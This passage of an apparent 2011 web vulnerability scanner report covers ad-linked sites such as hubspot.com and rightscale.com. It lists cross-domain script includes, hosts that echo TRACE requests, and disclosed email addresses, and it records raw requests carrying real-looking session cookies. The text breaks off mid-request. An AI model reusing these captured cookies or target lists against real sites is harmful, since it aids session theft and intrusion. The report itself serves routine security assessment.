Path:	/free-trial/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /free-trial/ HTTP/1.1
Host: www.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=bce5Z7JJzAEkAAAAMTA2NDMzOTEtOGY4Yi00Y2E0LTk5N2UtN2RmMjAwOWM0Mjc20; ASP.NET_SessionId=n2pxct2tag4iwgih2alnl545; HUBSPOT130=68228268.20480.0000; hubspotutktzo=-5; hubspotdt=2011-05-15%2012%3A53%3A12; hubspotutk=a3ef224db6434804a3e24ca05d84f49f; hubspotvd=a3ef224db6434804a3e24ca05d84f49f; hubspotvw=a3ef224db6434804a3e24ca05d84f49f; hubspotvm=a3ef224db6434804a3e24ca05d84f49f; hsfirstvisit=http%3A%2F%2Fwww.hubspot.com%2Febooks%2Ffacebook-page-marketing-ebook-2011%2F%3Fsource%3Dhspd-InsideFacebook-200x200ad-201104|http%3A%2F%2Fwww.insidefacebook.com%2F|2011-05-15%2012%3A53%3A12; __ar_v4=%7CSNWCKNCH3JFBBA3BHHHZOL%3A20110514%3A1%7CYNYIFZAM3NACFPVLCC56LA%3A20110514%3A1%7CYBTCZKMLVJGNJKSIKUO3HL%3A20110514%3A1; CR_4630_0=3F0FD61CD212A32B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36568
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sun, 15 May 2011 16:54:29 GMT
Connection: close

<!DOCTYPE html>

<html>
<head id="Head">

<script type="text/javascript">
//<![CDATA[
window.hubspot={splitTimes:{preHead:new Date()}};
//]]>
</script>
<meta id="Me
...[SNIP]...
</script>

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

17.7. http://www.hubspot.com/free-trial/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/free-trial/Default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

Response

17.8. http://www.hubspot.com/portals/53/skins/hubspot/search.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/portals/53/skins/hubspot/search.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/cse/brand?form=cse-search-box&lang=en&sitesearch=true

Request

GET /portals/53/skins/hubspot/search.html HTTP/1.1
Host: www.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=bce5Z7JJzAEkAAAAMTA2NDMzOTEtOGY4Yi00Y2E0LTk5N2UtN2RmMjAwOWM0Mjc20; ASP.NET_SessionId=n2pxct2tag4iwgih2alnl545; HUBSPOT130=68228268.20480.0000; hubspotutktzo=-5

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 07 Mar 2011 23:24:30 GMT
Accept-Ranges: bytes
ETag: "0be4ce1eddcb1:10188"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 16:53:09 GMT
Connection: close
Content-Length: 1523

<!DOCTYPE html>
<html>
<head>

<style type="text/css">
<!--
html, body {margin:0; padding:0;}

input[type=text]:focus,input[type=password]:focus {outline:0 none;}

form#cse-search-box {background:#fff
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...

17.9. http://www.insidefacebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidefacebook.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://insidenetwork.personforce.com/jobbox/insidefacebook.js
http://platform.twitter.com/widgets.js

Request

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:52:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.insidefacebook.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 155205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div style="width:200px;"><script src="http://insidenetwork.personforce.com/jobbox/insidefacebook.js"></script>
...[SNIP]...

17.10. http://www.insidemobileapps.com/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidemobileapps.com
Path:	/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/

Issue detail

The response dynamically includes the following scripts from other domains:

http://insidenetwork.personforce.com/jobbox/insidemobileapps.js
http://platform.twitter.com/widgets.js
http://www.facebook.com/connect.php/js/FB.SharePro/

Request

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.insidemobileapps.com/xmlrpc.php
Link: <http://www.insidemobileapps.com/?p=4126>; rel=shortlink
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 48055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</a><script src="http://www.facebook.com/connect.php/js/FB.SharePro/" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://www.facebook.com/connect.php/js/FB.SharePro/" type="text/javascript"></script>
...[SNIP]...
<div style="width:200px;"><script src="http://insidenetwork.personforce.com/jobbox/insidemobileapps.js"></script>
...[SNIP]...

17.11. http://www.insidemobileapps.com/2011/05/09/wp-includes/js/thickbox/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidemobileapps.com
Path:	/2011/05/09/wp-includes/js/thickbox/loadingAnimation.gif

Issue detail

The response dynamically includes the following script from another domain:

http://insidenetwork.personforce.com/jobbox/insidemobileapps.js

Request

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 16:53:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.insidemobileapps.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 16:53:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 30732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div style="width:200px;"><script src="http://insidenetwork.personforce.com/jobbox/insidemobileapps.js"></script>
...[SNIP]...

17.12. http://www.insidemobileapps.com/advertise-with-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidemobileapps.com
Path:	/advertise-with-us/

Issue detail

The response dynamically includes the following script from another domain:

http://insidenetwork.personforce.com/jobbox/insidemobileapps.js

Request

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:54:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.insidemobileapps.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 32961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div style="width:200px;"><script src="http://insidenetwork.personforce.com/jobbox/insidemobileapps.js"></script>
...[SNIP]...

17.13. http://www.lifestreetmedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifestreetmedia.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js

Request

Response

17.14. http://www.rightscale.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
https://munchkin.marketo.net/munchkin.js

Request

GET /index.php HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
Referer: http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie[RS_ls]=Advertising%2FSponsorship; cookie[RS_sd]=InsideFacebook; cookie[RS_campaign]=70170000000ftey; cookie[RS_campaign_status]=Responded; __utmz=77833355.1305478421.1.1.utmcsr=InsideFacebook|utmccn=SocialGaming|utmcmd=banner|utmcct=200x200; __utma=77833355.474410505.1305478421.1305478421.1305478421.1; __utmc=77833355; __utmb=77833355.1.10.1305478421; _mkto_trk=id:743-NGZ-698&token:_mch-rightscale.com-1305478421609-71321

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:55:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Cloud C
...[SNIP]...
<meta http-equiv="cache-control" CONTENT="no-cache" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

<script src="https://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

17.15. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The response dynamically includes the following script from another domain:

http://munchkin.marketo.net/munchkin.js

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

17.16. http://www.shoutlet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.googleadservices.com/pagead/conversion.js
https://www.google.com/jsapi?key=ABQIAAAAJdFw8dN_ryYXdjrd_6La7xRxKkcOD6j2nK9jRjo3eYM4aCYXPhTCYCsZKkIXfjnUJKWU9uksXx3OtA

Request

GET / HTTP/1.1
Host: www.shoutlet.com
Proxy-Connection: keep-alive
Referer: http://www.shoutlet.com/features/landingpage.php?utm_source=insidefacebook&utm_medium=display&utm_content=powerfb&utm_campaign=q211
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=211259095.1305478395.1.1.utmcsr=insidefacebook|utmccn=q211|utmcmd=display|utmcct=powerfb; __utma=211259095.908435419.1305478395.1305478395.1305478395.1; __utmc=211259095; __utmb=211259095.1.10.1305478395

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:13:04 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 11813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta name="google-site-verifi
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.google.com/jsapi?key=ABQIAAAAJdFw8dN_ryYXdjrd_6La7xRxKkcOD6j2nK9jRjo3eYM4aCYXPhTCYCsZKkIXfjnUJKWU9uksXx3OtA"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

17.17. http://www.shoutlet.com/features/landingpage.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/features/landingpage.php

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/jsapi?key=ABQIAAAAJdFw8dN_ryYXdjrd_6La7xRxKkcOD6j2nK9jRjo3eYM4aCYXPhTCYCsZKkIXfjnUJKWU9uksXx3OtA

Request

Response

17.18. http://www.votigo.com/corp/img/panel.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.votigo.com
Path:	/corp/img/panel.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/widget/?tabs=email%2Cpost%2Cweb&charset=utf-8&style=default&publisher=aab05f4a-d443-4658-9f3b-7ca5fd0b0354&popup=true&embeds=true

Request

GET /corp/img/panel.jpg HTTP/1.1
Host: www.votigo.com
Proxy-Connection: keep-alive
Referer: http://www.votigo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NJMZMZS192.168.1.181CKMLM; __utmz=259995789.1305478397.1.1.utmcsr=insidefacebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=259995789.1874215674.1305478397.1305478397.1305478397.1; __utmc=259995789; __utmb=259995789.1.10.1305478397; CAKEPHP=5nnr1mtk0k99fbmo9pksfmsrr5

Response

HTTP/1.0 404 Not Found
Date: Sun, 15 May 2011 16:54:56 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/200
...[SNIP]...
<script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=email%2Cpost%2Cweb&charset=utf-8&style=default&publisher=aab05f4a-d443-4658-9f3b-7ca5fd0b0354&popup=true&embeds=true"></script>
...[SNIP]...

18. TRACE method is enabled previous next
There are 11 instances of this issue:

http://743-ngz-698.mktoresp.com/
http://affiliate.invisionpower.com/
http://community.invisionpower.com/
http://cpm.criteo.com/
http://tracking.hubspot.com/
http://www.conversionruler.com/
http://www.criteo.com/
http://www.invisionpower.com/
https://www.invisionpower.com/
http://www.rightscale.com/
http://www.shoutlet.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

18.1. http://743-ngz-698.mktoresp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://743-ngz-698.mktoresp.com
Path:	/

Request

TRACE / HTTP/1.0
Host: 743-ngz-698.mktoresp.com
Cookie: 73eca83b67ecfc12

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 743-ngz-698.mktoresp.com
Cookie: 73eca83b67ecfc12

18.2. http://affiliate.invisionpower.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://affiliate.invisionpower.com
Path:	/

Request

TRACE / HTTP/1.0
Host: affiliate.invisionpower.com
Cookie: 56fa1f8c67867c55

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: affiliate.invisionpower.com
Cookie: 56fa1f8c67867c55

18.3. http://community.invisionpower.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.invisionpower.com
Path:	/

Request

TRACE / HTTP/1.0
Host: community.invisionpower.com
Cookie: 2698f4f39bdaa1ee

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: community.invisionpower.com
Cookie: 2698f4f39bdaa1ee

18.4. http://cpm.criteo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cpm.criteo.com
Cookie: a99090f3b0b2da28

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R3476726071; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:28 GMT
Server: Apache/2.2.X (OVH)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: cpm.criteo.com
Cookie: a99090f3b0b2da28
remote-ip: 173.193.214.243

18.5. http://tracking.hubspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracking.hubspot.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: 85357fb06d8b55b8

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:16 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: 85357fb06d8b55b8

18.6. http://www.conversionruler.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.conversionruler.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.conversionruler.com
Cookie: 3943de6650902e86

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:14 GMT
Server: Apache/2.2.11 (FreeBSD)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.conversionruler.com
Cookie: 3943de6650902e86

18.7. http://www.criteo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.criteo.com
Cookie: 5e73f8d473274537

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915101619; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:55 GMT
Server: Apache/2.2.X (OVH)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.criteo.com
Cookie: 5e73f8d473274537
remote-ip: 173.193.214.243

18.8. http://www.invisionpower.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.invisionpower.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.invisionpower.com
Cookie: 38c221c6bb3997b

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.invisionpower.com
Cookie: 38c221c6bb3997b

18.9. https://www.invisionpower.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.invisionpower.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.invisionpower.com
Cookie: 78b36532111d3ca6

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:28:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.invisionpower.com
Cookie: 78b36532111d3ca6

18.10. http://www.rightscale.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.rightscale.com
Cookie: 77a3dbef8dff65b

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:39 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.rightscale.com
Cookie: 77a3dbef8dff65b

18.11. http://www.shoutlet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.shoutlet.com
Cookie: cb4f744bb485519

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:11:29 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.shoutlet.com
Cookie: cb4f744bb485519

19. Email addresses disclosed previous next
There are 12 instances of this issue:

http://bstats.adbrite.com/click/bstats.gif
http://bstats.adbrite.com/click/bstats.gif
http://bstats.adbrite.com/click/bstats.gif
http://bstats.adbrite.com/click/bstats.gif
http://bstats.adbrite.com/click/bstats.gif
http://bstats.adbrite.com/click/bstats.gif
http://community.invisionpower.com/
http://cpm.criteo.com/lp/scripts/jquery.innerfade.js
http://www.insidefacebook.com/
http://www.invisionpower.com/suite/demo.php
http://www.shoutlet.com/
http://www.votigo.com/corp/css/screen.css

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

19.1. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following email address was disclosed in the response:

4dd006f1@www.hubspot.com

Request

GET /click/bstats.gif?kid=47432245&bapid=10434&uid=680833 HTTP/1.1
Host: bstats.adbrite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0M